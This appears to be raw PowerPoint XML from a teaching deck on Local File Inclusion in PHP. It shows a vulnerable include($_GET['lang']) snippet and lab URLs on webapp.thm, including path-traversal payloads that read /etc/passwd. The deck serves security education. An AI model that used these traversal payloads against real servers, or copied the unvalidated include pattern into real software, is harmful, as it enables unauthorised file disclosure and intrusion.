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8A8598-5056-40CB-8ACF-CF953580248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E7A24A-9B4B-41A8-9A3F-5CDE71878D22}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2224888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8A8598-5056-40CB-8ACF-CF953580248B}"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E7A24A-9B4B-41A8-9A3F-5CDE71878D22}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1195032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8A8598-5056-40CB-8ACF-CF953580248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E7A24A-9B4B-41A8-9A3F-5CDE71878D22}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="653114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8A8598-5056-40CB-8ACF-CF953580248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E7A24A-9B4B-41A8-9A3F-5CDE71878D22}"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27050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8A8598-5056-40CB-8ACF-CF953580248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E7A24A-9B4B-41A8-9A3F-5CDE71878D22}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1785383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8A8598-5056-40CB-8ACF-CF953580248B}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>19/10/2022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E7A24A-9B4B-41A8-9A3F-5CDE71878D22}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3134722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8A8598-5056-40CB-8ACF-CF953580248B}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>19/10/2022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E7A24A-9B4B-41A8-9A3F-5CDE71878D22}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1431520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8A8598-5056-40CB-8ACF-CF953580248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E7A24A-9B4B-41A8-9A3F-5CDE71878D22}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2241167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8A8598-5056-40CB-8ACF-CF953580248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E7A24A-9B4B-41A8-9A3F-5CDE71878D22}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339584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8A8598-5056-40CB-8ACF-CF953580248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E7A24A-9B4B-41A8-9A3F-5CDE71878D22}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73510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8A8598-5056-40CB-8ACF-CF953580248B}"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E7A24A-9B4B-41A8-9A3F-5CDE71878D22}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2066081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8A8598-5056-40CB-8ACF-CF953580248B}"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E7A24A-9B4B-41A8-9A3F-5CDE71878D22}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94531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8A8598-5056-40CB-8ACF-CF953580248B}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>19/10/2022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E7A24A-9B4B-41A8-9A3F-5CDE71878D22}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2153862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8A8598-5056-40CB-8ACF-CF953580248B}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>19/10/2022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8EE7A24A-9B4B-41A8-9A3F-5CDE71878D22}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79845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8A8598-5056-40CB-8ACF-CF953580248B}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>19/10/2022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8EE7A24A-9B4B-41A8-9A3F-5CDE71878D22}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2140690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88A8598-5056-40CB-8ACF-CF953580248B}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>19/10/2022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8EE7A24A-9B4B-41A8-9A3F-5CDE71878D22}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="740586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8A8598-5056-40CB-8ACF-CF953580248B}"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E7A24A-9B4B-41A8-9A3F-5CDE71878D22}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130376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8A8598-5056-40CB-8ACF-CF953580248B}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>19/10/2022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E7A24A-9B4B-41A8-9A3F-5CDE71878D22}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7738523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ebapp.thm/index.php?lang=../../../../etc/passw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ebapp.thm/get.php?file=../../../../etc/passw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21228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1800" dirty="0"/>
              <a:t>LFI attacks against web applications are often due to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>developers' lack of security awareness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>. With PHP, using functions such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include, require, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> often contribute to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerable web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> Suppose the web application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>provides two languages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>can select between the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t> EN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>AR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> PHP code above uses a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> request via the URL parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> to include the file of the page. The call can be done by sending the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> request as follows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://webapp.thm/index.php?lang=EN.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> to load the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>English </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>page  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Or</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://webapp.thm/index.php?lang=AR.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> to load the Arabic page, where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EN.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AR.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> files exist in the same directory.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Theoretically, we can access and display any readable file on the server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from the code above </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>if there isn't </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>any input validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>. Let's say we want to read the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> file, which contains sensitive information about the users of the Linux operating system, we can try the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>following: http://webapp.thm/get.php?file=/etc/passwd </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>In this case, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>it works </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>because there isn't a directory specified in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>function and no input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>validation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928049" y="1583140"/>
            <a:ext cx="4353636" cy="11737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dirty="0"/>
              <a:t>&lt;?PHP </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>	include($_GET["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>"]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3338732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39" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Next, In the following code, the developer decided to specify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>the function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>In the above code, the developer decided to use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>function to call PHP pages in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>languages directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>only via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>parameters.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>there is no input validation, the attacker can manipulate the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>by replacing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>input with other OS-sensitive files such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Again the payload looks similar to the path traversal, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>but the include function allows us to include any called files into the current page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>. The following will be the exploit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://webapp.thm/index.php?lang=../../../../etc/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
